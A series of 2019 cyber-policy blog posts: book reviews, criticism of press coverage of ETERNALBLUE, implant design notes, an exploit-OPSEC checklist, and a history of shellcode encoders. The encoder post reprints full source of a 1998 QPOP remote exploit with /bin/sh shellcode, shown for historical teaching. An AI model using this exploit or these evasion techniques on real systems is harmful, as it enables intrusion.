Saturday, June 15, 2019

Bytes, Bombs and Spies - A guest review

After reading his book review on ‘Bytes, Bombs, and Spies’ Dave was kind enough to offer me a guest blog post to share my own thoughts. First I think it helps to understand what this book is. It’s not exactly another cyber research/policy book. It’s a look at ‘The strategic dimensions of offensive cyber operations’ through ‘a collection of essays’.

The reason I think this is important to note is because many of its authors contradict one another whether they intended to or not. Because this book is about offense I feel obligated to state the obvious. In offense the details matter. In fact they’re everything. It’s ‘you can write values k through kN but not beyond 258 bytes from the end of the struct, and the Nth position in your overwrite must have bits 1-4 set’ levels of accuracy or it just won’t work.

I tend to judge books like this based on how many new things I learned, not how many flaws I can find. In that regard this book is fantastic. Many of its authors are people I follow on Twitter and aggressively consume anything they write. They come from various academic, .mil, and .gov backgrounds. But there are also things in this book that give me cause for concern.

Anytime one of the book's essays ventures from abstract thinking into concrete implementation an experienced technical reader will cringe. Reading the terms ‘the {network, mail server}’ or ‘sysadmins’ makes me think the author did not sit down with an experienced SRE to understand how the cybers work in 2019. The way these simplistic architectures are described will make you nostalgic for a simpler time back when you were reading that 2001 CCNA exam prep guide. The internet in 2019 is comprised of massive platforms and ecosystems run by private companies. Find me a Fortune 500 outside the United States whose infrastructure doesn’t, in part, resolve to an AWS data center in Ashburn Virginia. Are there people who think a LAN of Win2k boxes with a single AD controller and an Exchange server is powering Gmail?

In the closing paragraphs of the ‘Second Acts In Cyberspace’ chapter Libicki makes the point that re-architecting is the only solution after a successful attack. Even organizations, public or private, that have the skills to build their own infrastructure build things that look nothing like it did 10 years ago. The platforms that power the modern internet are composed of hundreds of microservices. It’s likely that these design choices were specifically to meet the precise needs of global scale and cannot be “re-architected” without enormous effort. When DoD tackled Heartbleed they gave an award and a public nod to the team because the challenge was something like 8 million computing devices.

I was especially surprised by the ‘The Cartwright Conjecture’ chapter. I will read anything Jason Healy puts his name on but to me that theory fell apart entirely over the last few years.

“We’ve got to talk about our offensive capabilities … to make them credible so that people know there’s a penalty for attacking the United States” - General James Cartwright

I’ve never really bought into this concept as it assumes that the United States can deter cyber attacks by showcasing its own cyber capabilities. This line in particular “The bigger your hammer the less you have to swing it”. Did no one question what happens when your adversary takes your hammer and hits you in the face with it? Clearly a ‘stockpile’ of 0days and persistence tooling instills so much fear in our adversaries that they published it and then trolled people on Twitter. 

What groups such as the Shadow Brokers have done to the United States is what I have been advocating we should have been doing all along: publicly exposing the technical details of exploits and toolchains seen in the wild against American interests. That’s a ‘defend forward’ strategy I can get behind. Law enforcement does this to some degree but it's usually after you've been breached. The trolling bit, of course, is unnecessary. One of the things I found particularly interesting about this chapter was its mention of the United States having to co-opt or coerce, and weaponize technology companies in order to create fear in adversaries. Healy rightly points out the consequences of doing this. I’m not convinced this is needed at all. Our adversaries are likely already threatened by the fact their own operators have Gmail accounts or that they have to use operationally compromised systems in the US in order to reach Twitter. Doubling down on a free, secure, and open Internet is probably the best tool we will ever have.

This book is worth reading, and its authors deserve credit for exploring such a highly debated topic. What I think is lacking from most essays in this book is the understanding that we cannot have a strong offense without assuming some risk on others behalf. In 2019 every company is a technology company and if we are to get serious about defending an economy built on technology then we need to be honest with ourselves, it will come at the cost of a strategic offense.

Chris Rohlf


Friday, June 14, 2019

What does "On Team" mean?

https://techcrunch.com/2019/06/13/black-hat-keynote-will-hurd/



One issue with the VEP is that hackers, those who form the core of your offensive national-grade team, find it extremely off-putting when you kill their bugs. Even the terminology of that statement should give a policy-maker pause. While there are no absolutes in life, a VEP process is only not going to hamstring your recruitment and retainment when it is known internally to lean towards never killing bugs.


This brings us to Will Hurd and political divisions within a country. In many countries (Turkey, for example) the military has a very different cultural dynamic from the political sphere. This is extremely evident for the nascent cyber capabilities of a number of places, which if you are at the right conference or have the right Twitter network, you can ask about directly.

While Twitter is not available in China, Chinese hackers definitely are on it. The same is true for Iranians, and the Iranian team is exposed to a tech culture that is almost universally atheistic, pro-LGBQT, and with a wider global focus than their domestic policy team. Half the Iranian team is watching Dexter in their spare time for some reason. To be a hacker is to be an outlier and if your society or political organization does not support outliers, it is hard to recruit them.

This is also easy to see domestically - you hear DHS complain that nobody in the tech community will stand up and propose a good key escrow system. The DoD seemed both confused and concerned that company after US company is refusing to sell them advanced AI. If by structure your government lags on issues like gay rights, you will suffer in this domain.

It is equally true in almost every other country as well. It's hard to predict how these schisms will affect the balance of power in cyberspace. But I think it does.

In other words, I like Will Hurd a lot and I think he's an important voice in the community, but I also, if I had to predict, would say there is a good chance he will not end up keynoting BlackHat.

Tuesday, June 11, 2019

Book Review FALL; or DODGE IN HELL (SPOILERS)

https://www.amazon.com/Fall-Dodge-Hell-Neal-Stephenson/dp/006245871X



Neal Stephenson and William Gibson and Daniel Keys Moran all treated the problem of disinformation and over-information differently in their books. MINOR SPOILER WARNING btw.

NS's latest book is a cool 900 pages, longer than even those compendiums of cyber policy we usually review on this blog. I read it the entire way to Argentina and realized when we landed I was only 50% of the way through. The whole first section is about a near future where someone runs a successful strategic disinfo-op (using actors and faked media) against a town in America claiming that it has been attacked with nuclear weapons, while using cyber means to cut it off from the rest of the country. This works surprisingly well, and changes the nature of how people interact with the Internet as a result.

Good science fiction grapples with policy problems, in many ways, sooner and more accurately than policy writing. All the consternation over "Deep Fakes" is a proxy grieving process for "Mass media can no longer be used to control the masses". The recent controversy over the NYT's reporting on the Baltimore ransomware attack is perhaps a symptom of ongoing consensus fragmentation. You can, for any given factset, fool SOME of the people ALL of the time. We are essentially tribal in all things.

In other words, we always lived in Unreality, but the rise of the cyber domain means we now live in a Chaotic Unreality which seems to make a lot of people uncomfortable.

To be fair, everything about cyber makes policy people uncomfortable because the whole thing is so weird. The clearest example of this, to me, is Targeting, an aspect of projecting cyber power that is basically ignored. This is why someone ends up hacking a fish tank to later own a casino.

I don't know what makes good targeters. Smaller organizations tend to be better at it for obvious reasons that Cybercoms should probably address at some point because having a significant cyber effect is almost always perpendicular to the way a planner thinks it ought to be done.

VEEP covered another angle on this: In one episode the Chinese pay back a debt to a politician not by hacking an election itself, but by messing with the traffic lights and power in North Carolina during the Democratic Primary, in certain districts known to vote against her, which works perfectly well.

Good targeting is just not believing all the things you see around you because they actually don't exist, as the Matrix pointed out but as so few can internalize. In other words, Fall is a good book; I highly recommend it.


Monday, May 27, 2019

Baltimore is not EternalBlue

Recently a misleading and terribly researched article (via  Nicole Perlroth and Scott Shane) came out in the NYT which essentially blamed the NSA and ETERNALBLUE for various ransomeware attacks on American city governments, including Baltimore. This then ballooned to PBS and the BBC and a bunch of other places, all of which parroted its nonsense.

For starters, when you research the malware in question, it is something called "RobinHood", which has been analyzed here.

Hmm. Don't see anything about ETERNALBLUE, do we?
Explicitly, all available analysis claims it gets basically manually installed on the targets, probably after someone gets phished or a simple web exploit is used to break into a network. It's also fairly hard to believe that ETERNALBLUE is truly in play considering it has been patched for TWO YEARS and the OS it was useful against (Windows 7/2008) is due to be EOLed by Microsoft next year. And while yes, MS08-067 was useful on penetration tests for a long time, and no doubt ETERNALBLUE will always be useful somewhere, on geriatric machines left in closets next to Wang computers and the odd SPARC workstation, it's not going to be a professional ransomware crew's goto, because it would alert everyone and probably never work.

Generally what everyone uses for lateral movement is Active Directory. You can learn more about it from Microsoft Research themselves in this Infiltrate2015 talk! Because this is a design flaw, it's not something you can really patch.

A giant pile of wrong from the article because the authors don't know what they are talking about.


In case you're curious, hackers had exploits a long time before "until a decade ago", and in fact, were the originators of the domain, with powerful toolkits that nations copied. (This slide is from one of my recent policy talks)


First of all, "NOBUS" when used officially means only capabilities controlled by strong cryptography - exploits are never in that category. They are always a risk/reward calculation. Secondarily hackers had amazing exploits during the Cambrian explosion after the 1996 papers on buffer overflows came out. Here is a talk from Infiltrate2019 which covers a bit of the history.



I'm not sure what their UNNAMED BUT AMAZING sources said about ETERNALBLUE and the Baltimore ransomeware attack, but you have to apply a bit of basic cognition to the question and that particular exploit being used to do lateral movement for this ransomware is neither supported by any public facts, nor my own sources on the issue.

In addition, it is hard to say that ETERNALBLUE is anything other than the particular exploit leaked by the SHADOWBROKERS. Metasploit and many others have released combo-packs targeting many vulns fixed in that patch to provide more reliable exploits against many more target operating systems. Once a patch comes out, no matter who found the bug that led the patch, anyone can reverse engineer the patch to write an exploit. SO IT DOESN'T MATTER IF A BUG IS LEAKED/FOUND OR DISCOVERED INTERNALLY BY MICROSOFT IN TERMS OF RISK IF YOU HAVEN'T PATCHED TWO YEARS LATER. This is unfortunately a point that has to be made since Nicole and Scott started their bizarre and baseless ideological blame-game.

-----
EXTRAS:
For another well researched position on this, please see Rob Graham's piece here.





Monday, May 13, 2019

Hope is not a NOBUS strategy

So typically the first thing I do when I get a new implant to look at is see if the authors implemented public key encryption into it, or if they just have some sort of password authentication, and then maybe a symmetric algorithm for protecting their traffic. This was, for a while, a good way to track nation states because people who wanted their implants "easier" to deploy did not put public keys in them, whereas those of us who wanted a NOBUS backdoor generated a new public key per target (like this amazing one, Hydrogen, from 2004).




In fact, let's talk about a few key features of Hydrogen because most people have forgotten them and they're relevant, and let's do it in the form of my favorite thing, a numbered list:

  1. Embedded public key used to encrypt all traffic (and prevents MITM)
  2. Not easy to write an IDS or Nessus scanner script for, since the only handshake was a one byte back and forth and there was no defined standard destination/source port
  3. Uses Twofish instead of AES, for "reasons"
  4. Replay attack resistant (due to blind key exchange, which on many unix's was hashes of ps -aux since you could not then depend on /dev/urandom existing)
  5. Can be installed permanently or just used as a RAT
  6. Pure POSIX-compatible C code
    1. Ports cleanly to such amazing operating systems as DEC UNIX, SCO UNIX, without any #ifdefs
    2. Even ports to Windows (but via a few minor #ifdefs)
  7. 40K binaries - can be uuencoded and cut and pasted over slow links
  8. Connectback or Connect-To via Environment variables because of...
    1. Commandline spoofing (aka, you can call it ps -ef)
  9. Deployment scripts which write directly into the binary without needing recompile
  10. Bi-directional TCP and UDP redirection/Command Execution/File Transfer/Environment Variable setting, etc.
  11. Export Controlled!

It's easy to say that an implant with blind key exchange is better than one that uses a symmetric key, right up until you try to manage a lot of implants and find yourself needing a database to try to figure out which private keys go to which hosts, and of course, since your tools were probably written by hackers and not cryptographers, it's easy to get the math wrong, especially in the late 90's when so much was just getting started. Likewise, your big number library that you're dragging around to every operating system is half the size of your implant. As a final note: any bugs in your implant (aka, crashes, failure to let you in because you messed up the key, freezes, etc.) are fatal in a way that bugs in your word processor most definitely are not.

So it ends up not being a matter of technical capability, but one of POLICY.

From a policy perspective, we don't want to add implants to a host that can be taken over by an adversary. And we want all traffic in transit to be protected by strong encryption as well. It was rare to find cryptographics of this type in a remote access trojan for the time. BO2k, for example, had symmetric crypto as an optional plugin (and was mostly used for jokes). Modified SSHd's were sometimes used around then, but were large and clunky and had many drawbacks (such as not supporting socket redirection and being annoying to modify).

CNE OPSEC is often an exercise in risk reduction and probability calculation. True NOBUS capability, on the other hand, is mathematically based, something others cannot replicate, ideally something baked in as early as possible (i.e. the specification or hardware). In that sense no software vulnerability is NOBUS, much as we may want them to be.

Wednesday, May 8, 2019

OPSEC is a thing

Note: One of the many things you will NOT learn in this article is HOW the Chinese did anything

I want to point out that Nicole Perlroth, David E. Sanger and Scott Shane have, as usual, written an article (here) that is more advocacy than news. They say never to pick a fight with someone who buys ink by the barrel, but this article is pure nonsense. Let's let Rob Lee, who knows what he's talking about, say it succinctly.


The Symantec blogpost, which is as close as we can get to real information here, tells a sparse story - we know that a Chinese group used SMB exploits, which may or may not have been related to EQGRP code (?), to penetrate a few hosts in various places about a year before ShadowBrokers went public. Interestingly none of those places was 5EYES, despite the constant hysteria that they will "use our own tools against us!"

Let's briefly delve into possible reasons why they showed restraint:

  • This would likely get caught by EINSTEIN if sent in the clear over the wire
  • If they hacked something EQGRP also was resident on, then they would possibly notice, which would lead to a massive investigation
  • They don't need SMB bugs and kernel implants to get anything done in particular or they would have rewritten these bugs from scratch without using DoublePulsar

It's likely we don't know anything more than a small fraction of what they used the exploits or their variant of DoublePulsar against, assuming that BUCKEYE is the correct attribution and, in fact, it's not just EQGRP pretending to be BUCKEYE. The possibilities are endless with this little data, which is why it's amusing to see a fifteen page NYT report breathlessly fanning controversy over an imagined timeline.

But regardless, let's talk for a second. As we like to say, OPSEC is not using encrypted messengers and onion routers, but understanding your operating environment to a level of obsessive detail. And to that end, there are things you need to know before throwing an exploit to maintain NOBUS:

  • Is my traffic going over a sat link that people are listening to, even if they are not my target? (/usr/bin/traceroute - DO YOU HAVE IT?)
  • Will network latency/packet loss affect heap layout?
  • How busy is the target machine? 
  • Do I have a safe place to send my exploit logic close to the target, or should I just establish an encrypted tunnel that exits as close as possible to the target?
  • What IPS/IDS/etc does the target have installed? 
  • What kind of residue is left when this exploit fails? Or even when it succeeds? Are there CORE dumps to delete?
  • How many times has this exploit been used against this target? Have any of those boxes been discovered? Could they be watching for it?
  • What is the target's offensive capability? Could they have found a similar bug and plugged it into their version of EINSTEIN? 
  • What does it mean to be close to this target? How close is close enough? Is it possible to be closer? When is the best time to throw this exploit - during busy hours or off hours?
  • Can you run your exploit over an encrypted protocol (HTTPS? SMB+Privacy? IPSEC?) directly to the target?

We don't know that BUCKEYE didn't find these bugs on their own, or buy them from the same source, or get handed a bunch of intel from the Russians who run ShadowBrokers right after they got it but long before they announced. What we do know, is contrary to Matt Blaze and friends, exploits almost NEVER get caught in the wild when used, which is why it's so interesting when they are!


Look, the Chinese are the best in the world by every measure I can find, and they're going to catch you sometimes even if you make all the right decisions. It's a thing.


---
Resources
https://www.wired.com/story/nsa-zero-day-symantec-buckeye-china/?mbid=social_twitter&utm_brand=wired&utm_campaign=wired&utm_medium=social&utm_social-type=owned&utm_source=twitter

Tuesday, March 12, 2019

The Lost Art of Shellcode Encoder/Decoders

Introduction



Networked intrusion detection systems used to be a thing. But more importantly, stack overflows used to be a thing. And both of the attack that is a stack overflow, and the defense that is an IDS, turned an entire generation of hackers into experts at crafting encoder/decoders, with vestigial codepaths like a coccyx all throughout Metasploit and CANVAS and Core Impact and other tools from that era.

This post is a walkthrough of the entire problem space, from a historical perspective. If you either did not live through this era, or were not involved in information security at a technical level, then this is the only overview you will ever need, assuming you also click all the links and read those papers as well. This is the policy blog, and this post is for policy people who want to get up to speed on both the technical background of the basic cyber domain physics and anyone else interested in the subject: thousands upon thousands of hours writing shellcode went into this piece.


Decoders

A "shellcode decoder" takes an arbitrary encoded string, and then converts it into its original form and then executes it.

In modern times, you rarely use a shellcode decoder, since most places in memory that are readable are not executable so you have a "ROP Chain" instead. But it's important to study shellcode decoders, even if just as a student of history, because they point us to some basic physics in terms how cyber war works.

This simple stack overflow training tool shows how a list of "bad bytes" used to be a very important part of the entire exploitation process (\x00\r\n was a typical minimal set).

Imagine a simpler system, Windows 2000 perhaps, with simpler bugs, a strcpy(stackbuffer, input) or sprintf(stackbuffer,"%s\r\n", input). I'm not going to go over Buffer Overflows 101, as it was 15 years ago, except to say this: It had three simple features.

  • Your string was limited in length
  • Your string could have almost all values, but not 0x00
  • Your string would clobber various variables as you went towards the stored EIP, but you didn't want the program to crash when it used those variables
It's also true that x86 used to be a niche architecture, for specialists. Real hackers were so multi-lingual they often knew more platforms than they had pants. SPARC, MIPS, Alpha, x86, PA-RISC, POWER, etc. And on top of these chips, a multitude of OS types. SunOS was not Solaris was not Irix was not Tru64 was not HP-UX. But they all ran the same buggy software so you would often see exploits that had code for all major platforms in one file.

Zero-Free Shellcode


The first thing everyone did was write a shellcode that contained no zeros. Then you would have to do that for every platform, optimized for size. Then you would do that again, but also avoiding \r\n. Then again for removing spaces and plus signs. Then again, but instead of running /bin/sh and assuming stdin and stdout were useful, it would connect back to a listening host and proxy your connection. 

Clearly this gets old fast. But one shellcode per exploit had a side benefit: Everyone's was slightly different. My shellcode did not look like Duke_'s or Str's. And that made life harder for the primitive IDSs prowling the primordial cyber oceans, like sea scorpions with limited perception and infinite hunger. 

You can see this fascinating display of early-lifeform diversity on many websites, such as here.

This website doesn't say which badbytes are avoided by each shellcode for some reason.

This was an era before giant-botnets and router hackers made it so your exploits were never more than two hops away from your target. So while you COULD play network games to avoid an IDS, say send five different fragments, some of which you knew would get dropped by your target's network layer, but the IDS did not, it was hard to predict how confused the network layer a full second of ping time away from you would handle these kinds of shenanigans. So best to just not be the string they were looking for. 

Early Decoders

Most people very quickly wrote a FOR loop in assembly, that when executed XORed a string behind them with a fixed key. Of course, this sucks in so many ways.

First of all, picking which byte you were going to XOR an unknown string with means that sometimes there is NO byte that does not result in a 0x00 in the resultant string. For small hand-crafted exploits this was no problem: you picked an encoder, xor byte, and payload string and if they did not meet your needs, you adjusted them manually. (CANVAS used an "ADD" instead of an "XOR" for this reason).

As a prescient case study, let's look at Stran9er's BSDi shellcode:

/*
 * QPOP (version 2.4b2) _demonstration_ REMOTE exploit for FreeBSD 2.2.5.
 * and BSDi 2.1
 * 24-Jun-1998 by stran9er
 *
 * Based:
 *         FreeBSD/BSDi shellcode from some bsd_lpr_exploit.c by unknown author.
 *         x86 decode.bin/encode.c by Solar Designer.
 *
 * Disclaimer:
 *         this demonstration code is for educational purposes only! DO NOT USE!
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ESP 0xefbfd480
#define BMW 750

main(int argc, char **argv)
{
   int i,t,offset = 500;
   char buf[1012];
   char nop[] = "\x91\x92\x93\x94\x95\x96\x97\xF8\xF9\xFC\xFD";
   char decode_x86[] =
      "\x68\x5D\x5E\xFF\xD5\xFF\xD4\xFF\xF5\x8B\xF5\x90\x66\x31\x7D\x30"
      "\x33\x7D\x30\x90\x90\x8B\xC7\x66\x2D\x5D\x5D\xD5\x21\x8B\xFD\x83"
      "\xC7\x02\x8B\xEF\x90\x90\x90\x8A\xE0\x8B\xFE\x83\xC6\x01\x32\x67"
      "\x30\x30\x67\x30\x90\x75\xD5";/*\x79\x5F\x7D\x60\x5D\x63\x70\x5E"*/
   char shellcode_BSDi[] =
      "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
      "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
      "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
      "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
   
   fprintf(stderr, "QPOP (FreeBSD v 2.4b2) remote exploit by stran9er. - DO NOT USE! -\n");
   if (argc>1) offset = atoi(argv[1]);
   fprintf (stderr,"Using offset %d (esp==0x%x)",offset,ESP);
   offset+=ESP;
   fprintf (stderr," esp+offset=0x%x\n\n",offset);
   for(i=0;i<sizeof(buf);i++) buf[i]=nop[random()%strlen(nop)];
// memset(buf, 0x90, sizeof(buf));
   buf[sizeof(buf)-1]=0;
   for(i=0;i < (sizeof(decode_x86)-1);i++) buf[i+BMW] = decode_x86[i];
   for(t=0;t < sizeof(shellcode_BSDi);t++) {
    buf[t*2+i+BMW+0] = (unsigned char)shellcode_BSDi[t] % 0x21 + 0x5D;
    buf[t*2+i+BMW+1] = (unsigned char)shellcode_BSDi[t] / 0x21 + 0x5D;
   }
   buf[1008] = (offset & 0xff000000) >> 24;
   buf[1007] = (offset & 0x00ff0000) >> 16;
   buf[1006] = (offset & 0x0000ff00) >> 8;
   buf[1005] = (offset & 0x000000ff);
   printf("%s\n",buf);
}
/* -- CONFIDENTIAL -- */


This code had some interesting features: It randomized the NOP sled, avoiding 0x90 entirely, and it used a nibble encoder to bypass the bad bytes of Qpop. In shellcode used in real exploits (as opposed to academic papers) you are optimizing not for length(arbitrary shellcode), but for length(decoder)+length(encoded specific shellcode) + difficulty of manually writing the decoder. This made nibble encoding (aka, 0xFE -> 0x4F 0x4E) a popular solution even though it doubled the size of your shellcode.

One reason this kind of shellcode decoder was popular is that you often had to pass through a tolower() or toupper() function call on the way to your overflow as back then most overflows were still in strings passed around via text protocols.

Windows 


This brings us to the Windows platform which was notable for two major reasons:

  • Shellcodes needed to be larger to accommodate for finding functions by their hash in the PE header - so expanding them became more dangerous
  • Unicode became a thing
  • You rarely got to attack a service more than once (Unix services often restarted after they crashed, but Windows never did)

Chris Anley was the first to find some ways around the Unicode problem, which he called "Venitian" decoding. Typical UTF-16 would do some horrible things to your shellcode: It would insert zeros as every second byte.

To quote from his paper directly.

Why yes, Chris, that IS a complication.

Other hackers, myself and Phenoelit, included, then furthered this work by formalizing it and generalizing it to particular exploits we were working on in the 2003 era. However, the key realization was essentially that when you started your exploit, there were some things you knew, including the values of registers and particular sets of memory, that made some of these seemingly intractable problems perfectly doable.

AlphaNumeric shellcodes


This brings us to another shellcode innovation (2001) in which various people attacked the heavily restricted filter on x86: isalnum(). What you should be internalizing by now, if you've never written a shellcode decoder, is that each decoder attacked a specific mathematical transformation function of basically arbitrary complexity. The original Phrack article is here, but the code to generate the shellcodes is here. Skylined is still quite active and you can see his INFILTRATE slides here.

Another common shellcode of the time was the eggsearch shellcode, particularly on Windows, where you would need a tiny shellcode that could find a much larger more complicated shellcode, somewhere else in memory. This was quite difficult in practice as your stage-2 shellcode was almost certainly in many different places in RAM, corrupted in different ways. Likewise, searching all of RAM requires handling exceptions when accessing memory that was not mapped. With Windows you had the ability to use the built-in exception handling, but every other platform required a system call that could be used as an oracle to find out if a page was accessible or not. The other major issue was timing: Going through all of RAM takes a long time on older systems, and your connection might time out, triggering cleanups and unfortunate crashes. For systems which stored most of your data in writable but not executable pages, you'll also want to mprotect() it back to something which can execute before jumping to it, which added size and complexity. In writing shellcode, things that seem simple can often be quite complicated.

RISC Shellcode


So far this sojourn through history has ignored some key features with platform diversity: RISC systems. Early RISC systems each had some large subset of the following:

  • branch delay slots
  • code vs data caches
  • aligned instructions
  • register windows
  • huge amounts of registers
  • hardware support for Non-Execute memory pages
  • Per-Program system call numbers (lol!)

Sometimes the stack would go backwards (HPUX) or do other silly things as well (i.e. Irix systems often ran on one of many possible chips each of which was quite different!). There were many more features that Unix hackers dealt with long before Windows or Linux hackers had to.

LSD-PL TTDBSERVERD exploit shellcode for Solaris.
Recently, Horizon and I were reminiscing about the bn,a bn,a which characterized early Solaris SPARC shellcode. The goal of the first set of instructions of almost ANY shellcode is to FIND OUT WHERE IN MEMORY YOU ARE. This is difficult on most platforms, as you cannot just:

 mov $eip, $reg  

Instead, you engaged in some tricks, by using CALL (which typically would PUSH the current address onto the stack or store it in some utility register). In SPARC's case, the branch delay slot meant that the bn,a instruction would "Branch never, and annul (skip over) the next instruction". So the first three instructions in the shellcode above would load the location into a register by calling backwards, then skipping the call function. You'll notice bn,a has \x20 (space) as the first character, which meant a lot of shellcode had instead a slightly longer variant that set a flag with an arithmetic instruction, and then used "branch above" or "branch below" instead, depending on the particular bad bytes in place.

On x86 you could also do funny tricks with the floating point or other extended functions, for example this code by Noir:

"Still not perfect though"


Caching

Many shellcode decoders on RISC had a simple problem: When you change the data of a page, that change might not exist in the CPU's code cache. This led to extremely difficult to debug situations where your shellcode would crash in a RANDOM location on code that seemed perfectly good. And when you attach to it with a debugger and step through it, it would work every time.

The code and data caches get synchronized when any context switch happens or by a special
"Flush" instruction which never ever works for some unknown reason. Context switches happen whenever the CPU decides to execute another thread, which means sometimes you could force your exploit to be more reliable by placing the CPU under load. This of course, also involves "Register Windows" which meant that your use of the stack could be entirely different depending on the load of the processor, with more than one offset in your attack string for EIP. RISC IS NEAT RIGHT?

There were two main reliable ways to handle data vs code cache coherence problems. They were as follows:

  • Include an infinite loop at the end of your shellcode, and modify it to a NOP with your decoder. When the loop is cleared,  you know the cache is flushed!
  • Fork() or call another system call that you know will change contexts and flush the cache. 



ADMmutate

If 1999 K2 (Shane Macaulay) wrote a polymorphic shellcode library called ADMmutate which ended up being the top tier of shellcode operational security tools. The basic theory was that you could mutate almost all elements of your shellcode, and still have it work reliably. He explains the basic technique thusly:

So what do we have now? We have encoded shellcode, and substituted NOP's, all we need is to place our decoder into the code. What we have to be careful about is to produce code that resists signature analysis. It would not be cool if the IDS vendor could simply detect our decoder. 
Some techniques that are used here are multiple code paths, non operational pad instructions, out-of-order decoder generation and randomly generated instructions. 
For instance, if we intend to load a register with some known data (our decode key), we can push DATA, pop REGISTER or we can move DATA,REGISTER or CLEAR REGISTER, add DATA,REGISTER, etc... endless possibilities. Each instruction of the decoder can be substituted by any number equivalent instructions, so long as the algorithm is not changed. 
Another technique is non operational padding, to accomplish this, when generating the decoder we ensure that there are some spare CPU registers that are left available for any operation we see fit. For example, on IA32 EAX was selected, as it is optimized to be used with many instructions, and is occasionally the implicit target of an operation. 
This allows us to pad every instruction in our decoder with one of or more JUNKS!!! MUL X EAX, SHR X EAX, TEST EAX,EAX, etc... (X is randomly selected from an array of integers that passed through all shellcode requirements.) 
To further reduce the pattern of the decoder, out-of-order decoders are now supported. This will allow you to specify where in the decoder certain operational instructions may be located.

What this did when it went public is force every IDS vendor to either acknowledge failure, move to protocol parsing instead of signature detection, or emulate x86 (and other) architectures in order to draw heuristics on likely "executability" of strings.

None of these is a good option, and most of them are extremely RAM and CPU intensive. Yet network IDS systems are supposed to work "at scale". However, even today, most IDSs are still globbing byte streams like it was 1998.

Mutated System Call Numbers

AIX had a neat feature where the system call numbers were not static, which was especially a problem on remote exploits where fingerprinting was difficult. There was a decent paper from San (of XFocus) on this, where he used dtspcd to get a remote system's exact version, and another more recent one, although the better way is probably to build a XCOFF-parser shellcode from the "table of contents" pointer and call LibC functions directly, much as you would do in Windows. You'll note there are relatively a lot less public buffer overflow exploits for AIX than you would expect, if you do a survey, even for locals.

Conclusion

What historical shellcode DID once it ran is the topic of another blogpost, but for now it is easiest from a policy perspective to look at this entire topic as whether or not you have to store state, and if so, where. This concept drives down to the deepest levels of what technology will work on both defense and offense as it is a fundamental tradeoff, like matter vs energy, or Emacs vs VI. Hopefully you got something out of this more technical post! If you liked it, let us know and we'll continue the series with a section on system call proxying.